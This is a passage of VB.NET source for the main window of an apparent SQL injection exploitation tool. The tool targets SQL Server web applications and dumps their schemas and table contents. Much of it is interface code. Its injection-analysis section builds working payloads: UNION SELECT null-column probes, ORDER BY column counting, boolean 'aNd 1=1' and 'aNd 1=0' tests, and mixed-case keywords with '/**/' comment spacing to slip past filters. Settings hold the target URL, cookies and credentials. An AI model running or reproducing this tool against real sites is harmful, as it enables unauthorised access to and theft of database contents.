﻿'Author: Daniel Kachakil  (dani@kachakil.com)  Copyright 2009
Imports System.Threading

Public Class FormMain

    Private WithEvents m_Engine As SfxEngine
    Private m_Tables As List(Of TableInfo)


    Private Sub FormMain_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        Me.Text = Application.ProductName + "  [version " + Application.ProductVersion + "]   © " + Application.CompanyName

        Me.tslblStatus.Text = ""
        Me.ClearLog()

        Me.tabAnalysis.Enabled = False
        Me.SetUserInterfaceMode(UserInterfaceMode.NotInitialized)

        'ThreadPool.SetMaxThreads(1, 1)

        Me.cmbDatabaseEngine.Items.Add("SQL Server 2005/2008")

        Me.cmbDatabaseEngine.SelectedIndex = 0
        Me.txtUrlBase.Text = ""

        Me.txtEndInjectionWith.Text = "--"
    End Sub


#Region " Settings and initialization "
    Private Enum UserInterfaceMode
        NotInitialized
        InitializedWithoutSchema
        Working
        Ready
    End Enum

    Private Delegate Sub SetUserInterfaceModeCallback(ByVal uiMode As UserInterfaceMode)

    Private Sub SetUserInterfaceMode(ByVal uiMode As UserInterfaceMode)
        If Me.InvokeRequired Then
            Dim cbk As New SetUserInterfaceModeCallback(AddressOf SetUserInterfaceMode)
            Me.Invoke(cbk, New Object() {uiMode})
        Else
            Select Case uiMode
                Case UserInterfaceMode.NotInitialized
                    Me.btnApplySettings.Enabled = True
                    Me.btnInitialize.Enabled = True
                    'Me.grpInjectionOptions.Enabled = True
                    Me.grpBasicConfig.Enabled = True
                    Me.btnGetSchema.Enabled = False

                    Me.tabSchema.Enabled = False
                    'Me.tabAnalysis.Enabled = False
                    Me.tabTable.Enabled = False

                Case UserInterfaceMode.InitializedWithoutSchema
                    Me.btnApplySettings.Enabled = True
                    Me.btnInitialize.Enabled = True
                    'Me.grpInjectionOptions.Enabled = True
                    Me.grpBasicConfig.Enabled = True
                    Me.btnGetSchema.Enabled = True

                    Me.tabSchema.Enabled = False
                    Me.tabAnalysis.Enabled = True
                    Me.tabTable.Enabled = False

                    MessageBox.Show("The settings have been initialized. Now you can try to get the database schema.", "Information", MessageBoxButtons.OK, MessageBoxIcon.Information)


                Case UserInterfaceMode.Ready
                    Me.btnApplySettings.Enabled = True
                    Me.btnInitialize.Enabled = True
                    'Me.grpInjectionOptions.Enabled = True
                    Me.grpBasicConfig.Enabled = True
                    Me.btnGetSchema.Enabled = True

                    Me.tabSchema.Enabled = True
                    Me.tabAnalysis.Enabled = True
                    Me.tabTable.Enabled = True

                    Me.UpdateStatus("The injection engine is ready")

                Case UserInterfaceMode.Working
                    Me.btnApplySettings.Enabled = False
                    Me.btnInitialize.Enabled = False
                    'Me.grpInjectionOptions.Enabled = False
                    Me.grpBasicConfig.Enabled = False
                    Me.btnGetSchema.Enabled = False

                    Me.tabSchema.Enabled = True
                    Me.tabAnalysis.Enabled = True
                    Me.tabTable.Enabled = True
            End Select
        End If
    End Sub

    Private Sub btnValidateUrl_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnValidateUrl.Click
        Try
            Me.ValidateURL()
        Catch ex As Exception
            MessageBox.Show(ex.Message, "Error validating URL", MessageBoxButtons.OK, MessageBoxIcon.Error)
        End Try
    End Sub

    Private Sub ValidateURL()
        Dim url As String = Me.txtUrlBase.Text

        If String.IsNullOrEmpty(url) Then Throw New ApplicationException("The URL is empty")

        If url.StartsWith("https://", StringComparison.CurrentCultureIgnoreCase) Then
            Me.chkSSL.Checked = True
        ElseIf url.StartsWith("http://", StringComparison.CurrentCultureIgnoreCase) Then
            Me.chkSSL.Checked = False
        Else
            url = "http://" + url
            Me.chkSSL.Checked = False
        End If

        If url.Contains("?") Then
            Try
                Me.dgvHttpParams.Rows.Clear()

                For Each param As String In url.Split("?"c)(1).Split("&"c)
                    Dim params As String() = param.Split("="c)
                    Dim name As String = params(0)

                    If Not String.IsNullOrEmpty(name) Then
                        Dim value As String = ""
                        If params.Length > 1 Then value = params(1)

                        Me.dgvHttpParams.Rows.Add(name, value, False)
                    End If
                Next
            Catch ex As Exception
                Throw New ApplicationException("Error parsing the URL", ex)
            End Try
            url = url.Split("?"c)(0)
        End If

        Dim uri As New Uri(url, UriKind.Absolute)
        Me.txtUrlBase.Text = uri.ToString()
    End Sub

    Private m_ChangingParamsCheckboxes As Boolean = False

    Private Sub dgvHttpParams_CellValueChanged(ByVal sender As Object, ByVal e As System.Windows.Forms.DataGridViewCellEventArgs) Handles dgvHttpParams.CellValueChanged
        If Me.m_ChangingParamsCheckboxes OrElse e.RowIndex < 0 Then Exit Sub

        If e.ColumnIndex = Me.colInjectable.Index Then
            If CBool(Me.dgvHttpParams.Rows(e.RowIndex).Cells(e.ColumnIndex).Value) = True Then
                Me.m_ChangingParamsCheckboxes = True
                For Each row As DataGridViewRow In Me.dgvHttpParams.Rows
                    If row.Index <> e.RowIndex Then row.Cells(e.ColumnIndex).Value = False
                Next
                Me.m_ChangingParamsCheckboxes = False
            End If
        End If
    End Sub


    Private Shared Function GetNameValueCollection(ByVal dgv As DataGridView) As Specialized.NameValueCollection
        Dim params As New Specialized.NameValueCollection

        For Each row As DataGridViewRow In dgv.Rows
            Dim name As String = CStr(row.Cells(0).Value)
            Dim value As String = CStr(row.Cells(1).Value)
            If Not String.IsNullOrEmpty(name) AndAlso Not String.IsNullOrEmpty(value) Then
                params.Add(name, value)
            End If
        Next
        Return params
    End Function

    Private Function GetInjectableParamName() As String
        For Each row As DataGridViewRow In Me.dgvHttpParams.Rows
            If CBool(row.Cells(Me.colInjectable.Index).Value) = True Then
                Return CStr(row.Cells(Me.colParamName.Index).Value)
            End If
        Next

        If Me.dgvHttpParams.Rows.Count = 2 Then   'Including the new row
            Me.dgvHttpParams.Rows(0).Cells(Me.colInjectable.Index).Value = True
            Return CStr(Me.dgvHttpParams.Rows(0).Cells(Me.colParamName.Index).Value)
        Else
            Throw New ApplicationException("Injectable parameter name is missing")
        End If
    End Function


    Private Sub rbAuthentication_CheckedChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles rbAuthNtlm.CheckedChanged, rbAuthDigest.CheckedChanged, rbAuthBasic.CheckedChanged
        If Me.rbAuthNone.Checked Then
            Me.txtAuthUsername.Enabled = False
            Me.txtAuthPassword.Enabled = False
            Me.txtAuthDomain.Enabled = False
        ElseIf Me.rbAuthBasic.Checked OrElse Me.rbAuthDigest.Checked Then
            Me.txtAuthUsername.Enabled = True
            Me.txtAuthPassword.Enabled = True
            Me.txtAuthDomain.Enabled = False
        ElseIf Me.rbAuthNtlm.Checked Then
            Me.txtAuthUsername.Enabled = True
            Me.txtAuthPassword.Enabled = True
            Me.txtAuthDomain.Enabled = True
        End If
    End Sub

    Private Sub btnApplySettings_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnApplySettings.Click
        Try
            Me.ValidateURL()

            Dim httpSettings As New HttpSettings
            With httpSettings
                .TargetBaseUrl = Me.txtUrlBase.Text
                .SqlUnionPattern = Me.txtInjectionPattern.Text

                .AppendStartText = Me.txtStartInjectionWith.Text
                .AppendEndText = Me.txtEndInjectionWith.Text

                .UsePostMethod = Me.rbHttpPost.Checked

                .HttpParams = GetNameValueCollection(Me.dgvHttpParams)
                .Cookies = GetNameValueCollection(Me.dgvCookies)

                .InjectableHttpParamName = Me.GetInjectableParamName

                .ProxyAddress = Me.txtProxyAddress.Text
                .ProxyPort = CInt(Me.numProxyPort.Value)

                If Me.rbAuthNone.Checked Then
                    .Authentication = httpSettings.AuthenticationType.None
                ElseIf Me.rbAuthBasic.Checked Then
                    .Authentication = httpSettings.AuthenticationType.Basic
                    .UserName = Me.txtAuthUsername.Text
                    .Password = Me.txtAuthPassword.Text
                ElseIf Me.rbAuthDigest.Checked Then
                    .Authentication = httpSettings.AuthenticationType.Digest
                    .UserName = Me.txtAuthUsername.Text
                    .Password = Me.txtAuthPassword.Text
                ElseIf Me.rbAuthNtlm.Checked Then
                    .Authentication = httpSettings.AuthenticationType.Ntlm
                    .UserName = Me.txtAuthUsername.Text
                    .Password = Me.txtAuthPassword.Text
                    .Domain = Me.txtAuthDomain.Text
                End If
            End With

            m_Engine = New SfxEngine(httpSettings)

            Me.UpdateStatus("The settings has been successfully applied")

            Me.tabAnalysis.Enabled = True

        Catch ex As Exception
            MessageBox.Show(ex.Message, "Error", MessageBoxButtons.OK, MessageBoxIcon.Error)
        End Try
    End Sub


    Private Sub btnInitialize_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnInitialize.Click
        Try
            Me.btnApplySettings.PerformClick()

            If Me.m_Engine Is Nothing Then
                Me.tabAnalysis.Enabled = False
                Throw New ApplicationException("Engine not initialized")
            End If

            Me.m_Engine.Initialize()

            If Me.m_Tables Is Nothing OrElse Me.m_Tables.Count = 0 Then
                Me.SetUserInterfaceMode(UserInterfaceMode.InitializedWithoutSchema)
            Else
                Me.SetUserInterfaceMode(UserInterfaceMode.Ready)
            End If
        Catch ex As Exception
            Me.SetUserInterfaceMode(UserInterfaceMode.NotInitialized)
            MessageBox.Show(ex.Message, "Error", MessageBoxButtons.OK, MessageBoxIcon.Error)
        End Try
    End Sub
#End Region



#Region " Database extraction "
    Private Delegate Sub RefreshDatabaseSchemaCallback(ByVal setFocusOnTab As Boolean)

    Private Sub RefreshDatabaseSchema(Optional ByVal setFocusOnTab As Boolean = False)
        If Me.InvokeRequired Then
            Dim cbk As New RefreshDatabaseSchemaCallback(AddressOf RefreshDatabaseSchema)
            Me.Invoke(cbk, New Object() {setFocusOnTab})
        Else
            Me.lvSchema.BeginUpdate()

            Dim previousSelection(Me.lvSchema.SelectedIndices.Count - 1) As Integer
            Me.lvSchema.SelectedIndices.CopyTo(previousSelection, 0)
            Dim previousTopIndex As Integer = -1
            If Me.lvSchema.TopItem IsNot Nothing Then previousTopIndex = Me.lvSchema.TopItem.Index

            Me.lvSchema.Items.Clear()
            For Each table As TableInfo In Me.m_Tables
                Dim item As ListViewItem = lvSchema.Items.Add(CStr(IIf(Me.chkShowSchemaNames.Checked, table.FullName, table.Name)), 1)
                If table.RowCount >= 0 Then
                    item.SubItems.Add(table.RowCount.ToString("#,##0"))
                Else
                    item.SubItems.Add("?")
                End If

                If table.Columns.Count > 0 Then
                    item.SubItems.Add(table.Columns.Count.ToString("#,##0"))
                Else
                    item.SubItems.Add("?")
                End If

                If table.TotalBytes >= 0 Then
                    item.SubItems.Add((table.TotalBytes / 1024).ToString("#,##0 KB"))
                Else
                    item.SubItems.Add("?")
                End If

                item.SubItems.Add((table.RawXmlData.Length / 1024).ToString("#,##0 KB"))

                item.Tag = table

                If Array.IndexOf(previousSelection, item.Index) >= 0 Then item.Selected = True
            Next

            Me.lvSchema.EndUpdate()

            If previousTopIndex >= 0 Then Me.lvSchema.TopItem = Me.lvSchema.Items(previousTopIndex)

            Me.lvSchema.Refresh()

            If setFocusOnTab Then Me.tabCtrlMain.SelectedTab = Me.tabSchema
        End If
    End Sub

    Private Sub btnGetSchema_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnGetSchema.Click
        Me.QueueWorkItem(AddressOf GetDatabaseSchema, Nothing)
    End Sub

    Private Sub GetDatabaseSchema(ByVal emptyState As Object)
        m_ActiveThreadCounter.Increment()

        Me.m_Tables = Me.m_Engine.GetTablesInfo

        Me.RefreshDatabaseSchema(True)

        Me.SetUserInterfaceMode(UserInterfaceMode.Ready)

        m_ActiveThreadCounter.Decrement()
    End Sub

    Private Sub GetTableRowCount(ByVal tableInfo As Object)
        m_ActiveThreadCounter.Increment()
        Me.m_Engine.GetTableRowCount(CType(tableInfo, TableInfo))
        m_ActiveThreadCounter.Decrement()
    End Sub

    Private Sub GetTableSize(ByVal tableInfo As Object)
        m_ActiveThreadCounter.Increment()
        Me.m_Engine.GetTableSize(CType(tableInfo, TableInfo))
        m_ActiveThreadCounter.Decrement()
    End Sub

    Private Sub GetTableSchema(ByVal tableInfo As Object)
        m_ActiveThreadCounter.Increment()
        Me.m_Engine.GetTableSchema(CType(tableInfo, TableInfo))
        m_ActiveThreadCounter.Decrement()
    End Sub

    Private Sub GetTableContent(ByVal tableInfo As Object)
        m_ActiveThreadCounter.Increment()
        Me.m_Engine.GetTableContent(CType(tableInfo, TableInfo))
        m_ActiveThreadCounter.Decrement()
    End Sub

    Private Sub btnTablesGetRowCount_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnTablesGetRowCount.Click
        For Each item As ListViewItem In lvSchema.Items
            If item.Selected Then
                Me.QueueWorkItem(AddressOf GetTableRowCount, CType(item.Tag, TableInfo))
            End If
        Next
    End Sub

    Private Sub btnTablesGetSize_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnTablesGetSize.Click
        For Each item As ListViewItem In lvSchema.Items
            If item.Selected Then
                Me.QueueWorkItem(AddressOf GetTableSize, CType(item.Tag, TableInfo))
            End If
        Next
    End Sub

    Private Sub btnTablesGetColumns_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnTablesGetColumns.Click
        For Each item As ListViewItem In lvSchema.Items
            If item.Selected Then
                Me.QueueWorkItem(AddressOf GetTableSchema, CType(item.Tag, TableInfo))
            End If
        Next
    End Sub

    Private Sub btnTablesGetContent_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnTablesGetContent.Click
        For Each item As ListViewItem In lvSchema.Items
            If item.Selected Then
                Me.QueueWorkItem(AddressOf GetTableContent, CType(item.Tag, TableInfo))
            End If
        Next
    End Sub


    Private WithEvents m_ActiveThreadCounter As New InterlockedCounter

    Private Function QueueWorkItem(ByVal callback As WaitCallback, ByVal state As Object) As Boolean
        Return ThreadPool.QueueUserWorkItem(callback, state)
    End Function



    Private Sub lvSchema_SelectedIndexChanged(ByVal sender As Object, ByVal e As System.EventArgs) Handles lvSchema.SelectedIndexChanged
        If Me.lvSchema.SelectedItems.Count = 0 Then
            Me.lblColumnsOfTable.Text = "Columns"
            Exit Sub
        End If

        Dim table As TableInfo = CType(Me.lvSchema.SelectedItems(0).Tag, TableInfo)

        Me.lblColumnsOfTable.Text = "Columns of " + table.Name

        Me.chklstColumns.Items.Clear()
        For Each col In table.Columns
            Me.chklstColumns.Items.Add(col, col.Selected)
        Next
    End Sub

    Private Sub chklstColumns_ItemCheck(ByVal sender As Object, ByVal e As System.Windows.Forms.ItemCheckEventArgs) Handles chklstColumns.ItemCheck
        CType(Me.chklstColumns.Items(e.Index), ColumnInfo).Selected = (e.NewValue = CheckState.Checked)
    End Sub

    Private Sub chkShowSchemaNames_CheckedChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles chkShowSchemaNames.CheckedChanged
        Me.RefreshDatabaseSchema()
    End Sub

    Private Sub btnTablesViewContent_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnTablesViewContent.Click
        Me.ShowSelectedTableContent()
    End Sub

    Private Sub lvSchema_DoubleClick(ByVal sender As Object, ByVal e As System.EventArgs) Handles lvSchema.DoubleClick
        Me.ShowSelectedTableContent()
    End Sub

    Private Sub ShowSelectedTableContent()
        Me.tabTable.Text = "Table data"
        If Me.lvSchema.SelectedItems.Count = 0 Then Exit Sub

        Dim table As TableInfo = CType(Me.lvSchema.SelectedItems(0).Tag, TableInfo)
        Me.dgvTableContent.DataSource = table.GetDataTable
        Me.lblTableDataRowCount.Text = "(" + Me.dgvTableContent.RowCount.ToString + " rows)"
        Me.tabCtrlMain.SelectedTab = Me.tabTable
        Me.tabTable.Text += " [" + table.Name + "]"
    End Sub
#End Region



#Region " Debug log and status events "
    Private Delegate Sub AddDebugMessageCallback(ByVal message As String)

    Private Sub AddDebugMessage(ByVal message As String)
        If Me.txtDebugLog.InvokeRequired Then
            Dim cbk As New AddDebugMessageCallback(AddressOf AddDebugMessage)
            Me.Invoke(cbk, New Object() {message})
        Else
            If Me.chkEnableLog.Checked Then
                Me.txtDebugLog.AppendText(message + vbCrLf)
                Me.txtDebugLog.SelectionStart = Me.txtDebugLog.Text.Length
                Me.txtDebugLog.ScrollToCaret()
            End If
        End If
    End Sub

    Private Delegate Sub UpdateStatusCallback(ByVal message As String)

    Private Sub UpdateStatus(ByVal message As String)
        If Me.InvokeRequired Then
            Dim cbk As New UpdateStatusCallback(AddressOf UpdateStatus)
            Me.Invoke(cbk, New Object() {message})
        Else
            Me.AddDebugMessage(message)
            Me.tslblStatus.Text = message
            Me.statusStripMain.Refresh()
        End If
    End Sub

    Private Delegate Sub SetControlTextCallback(ByVal control As Control, ByVal text As String)

    Private Sub SetControlText(ByVal control As Control, ByVal text As String)
        If control.InvokeRequired Then
            Dim cbk As New SetControlTextCallback(AddressOf SetControlText)
            Me.Invoke(cbk, New Object() {control, text})
        Else
            control.Text = text
        End If
    End Sub

    Private Delegate Sub SetToolStripItemTextCallback(ByVal tsItem As ToolStripItem, ByVal text As String)

    Private Sub SetToolStripItemText(ByVal tsItem As ToolStripItem, ByVal text As String)
        If tsItem.GetCurrentParent.InvokeRequired Then
            Dim cbk As New SetToolStripItemTextCallback(AddressOf SetToolStripItemText)
            Me.Invoke(cbk, New Object() {tsItem, text})
        Else
            tsItem.Text = text
        End If
    End Sub

    Private Sub lstInjectionResponses_SelectedIndexChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles lstInjectionResponses.SelectedIndexChanged
        If Me.lstInjectionResponses.SelectedIndex < 0 Then Exit Sub

        Dim response As InjectionResponse = CType(Me.lstInjectionResponses.SelectedItem, InjectionResponse)

        Me.txtResponseInjection.Text = response.InjectedData
        Me.ToolTip.SetToolTip(Me.txtResponseInjection, Me.txtResponseInjection.Text.Replace("/**/", " ").ToUpper)
        Me.lblResponseStatus.Text = CInt(response.HttpStatus).ToString + " - " + response.HttpStatus.ToString
        Me.lblResponseTime.Text = (response.ResponseTime.TotalMilliseconds / 1000).ToString("0.00 s")

        If response.Response Is Nothing Then
            Me.webBrowserDebug.DocumentText = ""
            Me.txtResponseText.Text = ""
        ElseIf response.Response.Length < 200000 Then
            Me.webBrowserDebug.DocumentText = response.Response
            Me.txtResponseText.Text = response.Response
        Else
            Me.webBrowserDebug.DocumentText = "(The response is too large. It will not be displayed in the browser)"
            Me.txtResponseText.Text = response.Response.Substring(0, 200000)
            Me.txtResponseText.AppendText("...[TRUNCATED]")
        End If
    End Sub

    Private Sub btnClearLog_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnClearLog.Click
        Me.ClearLog()
    End Sub

    Private Sub ClearLog()
        Me.lstInjectionResponses.Items.Clear()
        Me.webBrowserDebug.DocumentText = ""
        Me.txtResponseText.Text = ""
        Me.txtResponseInjection.Text = ""
        Me.lblResponseStatus.Text = ""
        Me.lblResponseTime.Text = ""
    End Sub

    Private Delegate Sub AddInjectionResponseCallback(ByVal injectionResponse As InjectionResponse)

    Private Sub AddInjectionResponse(ByVal injectionResponse As InjectionResponse)
        If Me.InvokeRequired Then
            Dim cbk As New AddInjectionResponseCallback(AddressOf AddInjectionResponse)
            Me.Invoke(cbk, New Object() {injectionResponse})
        Else
            Me.lstInjectionResponses.Items.Add(injectionResponse)
        End If
    End Sub

    Private Sub m_Engine_DebugEvent(ByVal sender As Object, ByVal e As DebugEventArgs) Handles m_Engine.DebugEvent
        If e.InjectionResponse IsNot Nothing Then Me.AddInjectionResponse(e.InjectionResponse)
        If Not String.IsNullOrEmpty(e.Message) Then Me.AddDebugMessage(e.ToString)
    End Sub

    Private Sub m_Engine_JobCompleted(ByVal sender As Object, ByVal e As DebugEventArgs) Handles m_Engine.JobCompleted
        Me.UpdateStatus(e.ToString)
        Me.RefreshDatabaseSchema()
    End Sub

    Private Sub m_ActiveThreadCounter_ValueChanged(ByVal sender As Object, ByVal newValue As Integer) Handles m_ActiveThreadCounter.ValueChanged
        Me.SetToolStripItemText(Me.tslblWorkingThreads, "Working threads: " + m_ActiveThreadCounter.Value.ToString)
        If m_ActiveThreadCounter.Value > 0 Then
            Me.SetUserInterfaceMode(UserInterfaceMode.Working)
        Else
            Me.SetUserInterfaceMode(UserInterfaceMode.Ready)
        End If
    End Sub
#End Region



#Region " Other events "
    Private Sub FormMain_SizeChanged(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.SizeChanged
        If Me.WindowState = FormWindowState.Maximized Then Me.Refresh()
    End Sub

    Private Sub FormMain_ResizeEnd(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.ResizeEnd
        Me.Refresh()
    End Sub

    Private Sub AboutToolStripMenuItem_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles AboutToolStripMenuItem.Click
        Dim frm As New FormAbout
        frm.ShowDialog()
    End Sub
#End Region



#Region " Injection analysis "
    Private m_UnionSqlParams As New List(Of SqlParameterInfo)

    Private Sub btnAutoDetectUnionParamCount_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnAutoDetectUnionParamCount.Click
        Try
            Dim paramCount As Integer = -1
            For i = 1 To 100
                If Me.rbUseOrderByMethod.Checked Then
                    If Not m_Engine.IsTrue("/**/ORDeR/**/bY/**/" + i.ToString, Me.txtTrueSignature.Text, Me.txtFalseSignature.Text) Then
                        If paramCount < 0 Then
                            paramCount = i - 1
                        ElseIf paramCount = i - 3 Then
                            Exit For
                        End If
                    ElseIf paramCount >= 0 Then
                        paramCount = -1
                    End If
                Else
                    Dim injection As String = "/**/UnION/**/SeLECT/**/" + New String("*"c, i).Replace("*", "null,").TrimEnd(","c)
                    If Me.rbUseUnionFalseMethod.Checked Then injection += "/**/WHeRE/**/1=0"
                    If m_Engine.IsTrue(injection, Me.txtTrueSignature.Text, Me.txtFalseSignature.Text) Then
                        paramCount = i
                        Exit For
                    End If
                End If
            Next

            If paramCount > 0 Then
                Me.numUnionParamsCount.Value = paramCount

                Me.m_UnionSqlParams.Clear()
                For i = 1 To paramCount
                    Me.m_UnionSqlParams.Add(New SqlParameterInfo)
                Next

                RefreshUnionSqlParams()
            Else
                Me.numUnionParamsCount.Value = 0
            End If

        Catch ex As Exception
            MessageBox.Show(ex.Message, "Warning", MessageBoxButtons.OK, MessageBoxIcon.Warning)
        End Try
    End Sub


    Private Sub RefreshUnionSqlParams()
        Me.pnlUnionParams.Controls.Clear()
        For Each param In m_UnionSqlParams
            Dim txtParam As New TextBox With {.Text = param.Value, .Width = 50, .BackColor = param.GetTypeColor}
            Me.pnlUnionParams.Controls.Add(txtParam)
        Next

        Dim pattern As String = GetUnionStatement(False)

        Dim stringParam As New SqlParameterInfo
        stringParam.SetTypeAndMarkerValue(SqlParameterInfo.DataType.String)

        Dim i As Integer = pattern.IndexOf(stringParam.Value)
        If i >= 0 Then
            pattern = pattern.Remove(i, stringParam.Value.Length).Insert(i, "{0}")
        End If
        Me.txtPossibleInjectionPattern.Text = pattern
    End Sub


    Private Function GetUnionStatement(ByVal negateCondition As Boolean) As String
        Dim sb As New System.Text.StringBuilder("/**/UnION/**/SeLECT/**/")

        For Each param In m_UnionSqlParams
            sb.Append(param.Value).Append(",")
        Next
        sb.Remove(sb.Length - 1, 1)
        If negateCondition Then sb.Append("/**/WHeRE/**/1=0")

        Return sb.ToString()
    End Function



    Private Sub btnAutoDetectParamTypes_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnAutoDetectParamTypes.Click
        Try
            For Each param In m_UnionSqlParams
                param.SetTypeAndMarkerValue(SqlParameterInfo.DataType.Numeric)
                If m_Engine.IsTrue(Me.GetUnionStatement(True), Me.txtTrueSignature.Text, Me.txtFalseSignature.Text) Then
                    Continue For
                End If

                param.SetTypeAndMarkerValue(SqlParameterInfo.DataType.String)
                If m_Engine.IsTrue(Me.GetUnionStatement(True), Me.txtTrueSignature.Text, Me.txtFalseSignature.Text) Then
                    If Me.chkStopAnalysisOnFirstString.Checked Then Exit For
                    Continue For
                End If

                param.SetTypeAndMarkerValue(SqlParameterInfo.DataType.Unknown)
            Next

            Me.RefreshUnionSqlParams()
            'Me.Refresh()

            'For Each param In m_UnionSqlParams
            '    param.SetTypeAndMarkerValue(SqlParameterInfo.DataType.Numeric)
            '    If m_Engine.IsTrue(Me.GetUnionStatement(False), Me.txtTrueSignature.Text, Me.txtFalseSignature.Text) Then
            '        Continue For
            '    End If

            '    param.SetTypeAndMarkerValue(SqlParameterInfo.DataType.String)
            '    If m_Engine.IsTrue(Me.GetUnionStatement(False), Me.txtTrueSignature.Text, Me.txtFalseSignature.Text) Then
            '        Continue For
            '    End If

            '    param.SetTypeAndMarkerValue(SqlParameterInfo.DataType.Unknown)
            'Next

            ''Me.RefreshUnionSqlParams()
            ''Me.Refresh()
            ''Exit Sub

            'If m_Engine.IsTrue(Me.GetUnionStatement(False), Me.txtTrueSignature.Text, Me.txtFalseSignature.Text) Then
            '    For Each param In m_UnionSqlParams
            '        If param.Type = SqlParameterInfo.DataType.Numeric Then
            '            param.SetTypeAndMarkerValue(SqlParameterInfo.DataType.String)
            '            If m_Engine.IsTrue(Me.GetUnionStatement(False), Me.txtTrueSignature.Text, Me.txtFalseSignature.Text) Then
            '                Continue For
            '            End If

            '            param.SetTypeAndMarkerValue(SqlParameterInfo.DataType.Boolean)
            '            If m_Engine.IsTrue(Me.GetUnionStatement(False), Me.txtTrueSignature.Text, Me.txtFalseSignature.Text) Then
            '                Continue For
            '            End If

            '            param.SetTypeAndMarkerValue(SqlParameterInfo.DataType.Date)
            '            If m_Engine.IsTrue(Me.GetUnionStatement(False), Me.txtTrueSignature.Text, Me.txtFalseSignature.Text) Then
            '                Continue For
            '            End If

            '            param.SetTypeAndMarkerValue(SqlParameterInfo.DataType.Numeric)
            '            Continue For
            '        End If
            '    Next
            'End If

            'Me.RefreshUnionSqlParams()
        Catch ex As Exception
            MessageBox.Show(ex.Message, "Warning", MessageBoxButtons.OK, MessageBoxIcon.Warning)
        End Try
    End Sub

    Private Sub btnInjectTestConditions_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnInjectTestConditions.Click
        Dim isCheckEnabled As Boolean = Me.chkEnableLog.Enabled
        Me.chkEnableLog.Enabled = True

        m_Engine.GetInjectionResponse("/**/aNd/**/1=1")
        m_Engine.GetInjectionResponse("/**/aNd/**/1=0")
        m_Engine.GetInjectionResponse("/**/x")

        Me.chkEnableLog.Enabled = isCheckEnabled
        MessageBox.Show("Different conditions have been injected: True, False and Error. Check the last three responses in the debug log for more details.", "Test completed", MessageBoxButtons.OK, MessageBoxIcon.Information)

        Me.tabCtrlMain.SelectedTab = Me.tabDebug
    End Sub

    Private Sub btnValidateAnalysisSignatures_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnValidateAnalysisSignatures.Click
        Try
            If Not m_Engine.IsTrue("/**/aNd/**/1=1", Me.txtTrueSignature.Text, Me.txtFalseSignature.Text) OrElse _
               Not m_Engine.IsTrue("/**/aNd/**/char(65)=char(65)", Me.txtTrueSignature.Text, Me.txtFalseSignature.Text) OrElse _
               Not m_Engine.IsTrue("/**/aNd/**/123=100+23", Me.txtTrueSignature.Text, Me.txtFalseSignature.Text) Then

                MessageBox.Show("True signature seems to be incorrect or ambiguous", "Warning", MessageBoxButtons.OK, MessageBoxIcon.Warning)

            ElseIf m_Engine.IsTrue("/**/aNd/**/1=0", Me.txtTrueSignature.Text, Me.txtFalseSignature.Text) OrElse _
                   m_Engine.IsTrue("/**/aNd/**/char(65)=char(66)", Me.txtTrueSignature.Text, Me.txtFalseSignature.Text) OrElse _
                   m_Engine.IsTrue("/**/aNd/**/123=100+6", Me.txtTrueSignature.Text, Me.txtFalseSignature.Text) Then

                MessageBox.Show("False signature seems to be incorrect or ambiguous", "Warning", MessageBoxButtons.OK, MessageBoxIcon.Warning)
            Else
                MessageBox.Show("The signature seems to be valid", "Information", MessageBoxButtons.OK, MessageBoxIcon.Information)
            End If
        Catch ex As Exception
            MessageBox.Show("None of the signatures has been found in the response. Try to keep only one of them instead of specify both.", "Warning", MessageBoxButtons.OK, MessageBoxIcon.Warning)
        End Try
    End Sub


    Private Sub numUnionParamsCount_ValueChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles numUnionParamsCount.ValueChanged
        Dim dif As Integer = Me.m_UnionSqlParams.Count - CInt(Me.numUnionParamsCount.Value)

        Me.btnAutoDetectParamTypes.Enabled = Not (Me.numUnionParamsCount.Value = 0)
        Me.chkStopAnalysisOnFirstString.Enabled = Me.btnAutoDetectParamTypes.Enabled

        If dif = 0 Then Exit Sub

        If dif > 0 Then
            For i = 1 To dif
                Me.m_UnionSqlParams.RemoveAt(Me.m_UnionSqlParams.Count - 1)
            Next
        Else
            For i = 1 To -dif
                Me.m_UnionSqlParams.Add(New SqlParameterInfo)
            Next
        End If

        Me.RefreshUnionSqlParams()
    End Sub

    Private Sub btnApplyPattern_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnApplyPattern.Click
        Me.txtInjectionPattern.Text = Me.txtPossibleInjectionPattern.Text
        Me.tabCtrlMain.SelectedTab = Me.tabConfig
        Me.btnInitialize.PerformClick()
    End Sub

    Private Sub txtSignatures_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtTrueSignature.TextChanged, txtFalseSignature.TextChanged
        If String.IsNullOrEmpty(Me.txtTrueSignature.Text) AndAlso String.IsNullOrEmpty(Me.txtFalseSignature.Text) Then
            Me.btnValidateAnalysisSignatures.Enabled = False
        Else
            Me.btnValidateAnalysisSignatures.Enabled = True
        End If
    End Sub


    Private Sub txtPossibleInjectionPattern_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtPossibleInjectionPattern.TextChanged
        If String.IsNullOrEmpty(Me.txtPossibleInjectionPattern.Text) OrElse Not Me.txtPossibleInjectionPattern.Text.Contains("{0}") Then
            Me.btnApplyPattern.Enabled = False
        Else
            Me.btnApplyPattern.Enabled = True
        End If
    End Sub

